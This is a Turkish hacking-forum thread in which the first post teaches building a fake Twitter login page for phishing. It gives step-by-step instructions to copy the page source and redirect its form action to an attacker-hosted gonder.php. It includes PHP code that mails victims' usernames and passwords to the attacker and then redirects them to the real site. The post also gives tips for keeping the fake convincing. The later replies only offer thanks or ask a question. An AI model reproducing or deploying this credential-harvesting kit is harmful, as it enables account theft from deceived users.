İPUCU

Mail Güvenliği İstenmeyen e-postaları, kötü amaçlı yazılımları, kimlik avı girişimlerini ve gelişmiş hedefe yönelik saldırıları hakkında birçok bilgiye bu sayfamızdan ulaşabilirsiniz.

Seçenekler

Post Adresi Olmadan Fake Yapımı

11-04-2012 15:38
#1
By King - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2012
Mesajlar:
72
Teşekkür (Etti):
7
Teşekkür (Aldı):
18
Konular:
53
Ticaret:
(0) %
- En büyük sebebi kurbanımız fake sayfamıza giriş yapıp onayladığında
kurbana uyarı kutucuğu çıkıyor ve aşırı bir inandırıcılık zaafiyeti oluşuyor.
Zaten post adresi sadece verileri maile göndermeye yarıyor başka bi esprisi yok.
--------------------------------------------------------------------------------
Fake yapımını herkez biliyordur ama bi kez daha hatırlatmakta fayda görüyorum

1) sayfa kaynak kodlarını koplayıp kaydediyoruz
2) sayfa içinde ( form method veya form action ) kodlarını buluyoruz
3) Bu alanı post adresimize yönlendiriyoruz

Bunu Twitter için örnekleyelim örnek üzerinde daha iyi anlaşılır.

1) Bizim yapacağımız işlemde ise post adresi yerine bi php sayfası koyarak bu işi halletmek
öncelikle bi metin belgesi açıyoruz ve

PHP- Kodu:


<?php
$kime="mail adresiniz";
$baslik="Twiter Sifreleri";
$yonlendir="http://twitter.com/";
$Crim="UserName : ".$_POST[’User1’]."\\r\\n"."şifre : ".$_POST[’pass1’]."\\r\\n";
echo ’**********window.********.href = "’ . $yonlendir . ’";</script>’;
mail($kime, $baslik, $Crim)
?>


Bu kodları yapıstırıp .php uzantıyla kaydediyorsunuz

2) Twitterin kaynak kodlarını indiriyoruz ve kodları bir txt editör ile açıyoruz

3) ctrl-f tuşlarına basarak arama çubuğundan ( form action veya form method ) u buluyoruz.
twitterde form action var bunu kullanacağız.

4) Şimdi buradaki bilgileri gönderdiği yeri silerek buraya gönder.php adlı sayfamızın adresini yazıyoruz
örn=

PHP- Kodu:
<form action="http://www.frukocuk.com/gonder.php" class="signup signup-btn" method="post">

gibi

5) 4. aşamayı yapabilmek için gonder.php yi ftp sunucumuza göndermemiz gerekmektedir.

Not: bu işlemleri yaptığımızda sayfanın karakter yapısı bozulmaktadır yani türkçe karakterler bozuk çıkmaktadır
bu olayı göz ardı etmeyip inandırıcılığı kaybetmemek için onları elinizde düzeltmeniz gerekecektir.

11-04-2012 15:43
#2
rohst - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2012
Mesajlar:
320
Teşekkür (Etti):
20
Teşekkür (Aldı):
28
Konular:
15
Ticaret:
(0) %
güzel kodlar iyi bir konu üstüne değinmişsin.
11-02-2013 23:14
#3
hackers44 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
malatya
Mesajlar:
100
Teşekkür (Etti):
5
Teşekkür (Aldı):
1
Konular:
38
Ticaret:
(0) %
peki bunu link ettrmek gerekmyormu?
Kullanıcı İmzası
Bi Teşekkür Edersen Sevinirim.
13-02-2013 21:53
#4
Helmet2001 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2013
Nereden:
26:24 E 40:09 N
Yaş:
34
Mesajlar:
89
Teşekkür (Etti):
3
Teşekkür (Aldı):
3
Konular:
2
Ticaret:
(0) %
teşekkürler
Kullanıcı İmzası
[T]ürk [H]ack [T]eam



'' NE MUTLU TÜRKÜM DİYENE''

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı